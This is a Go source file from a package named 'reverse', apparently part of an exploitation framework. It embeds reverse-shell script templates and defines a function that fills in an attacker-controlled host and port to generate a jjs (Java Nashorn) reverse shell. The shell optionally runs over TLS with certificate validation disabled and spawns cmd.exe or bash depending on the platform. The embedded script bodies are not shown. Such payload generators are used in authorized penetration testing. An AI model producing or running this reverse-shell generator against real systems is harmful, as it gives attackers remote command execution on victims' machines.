jjs.go

package reverse

import (
	_ "embed"
	"fmt"
	"strings"
)

var (
	//go:embed jjs/reverse_shell.jjs
	JJSShell string

	//go:embed jjs/reverse_shell_ssl.jjs
	JJSShellSSL string
)

// Generates a script that can be used to create a reverse shell via jjs (Java javascript).
// This is an adapted version of Frohoff's OG gist. Additionally, the disabling of TLS validation
// logic was adapted from a blog written by Callan Howell-Pavia.
//
// The script will autodetect if the platform is Windows and provide a 'cmd.exe' shell. Otherwise
// bash is used.
//
// https://redthunder.blog/2018/04/09/disabling-hostname-validation-in-nashorn-javascript/
// https://gist.github.com/frohoff/8e7c2bf3737032a25051
func (jjs *JJSScriptPayload) Default(lhost string, lport int, ssl bool) string {
	var script string
	if ssl {
		script = strings.Trim(fmt.Sprintf(JJSShellSSL, lhost, lport), "\r\n")
	} else {
		script = strings.Trim(fmt.Sprintf(JJSShell, lhost, lport), "\r\n")
	}

	return script
}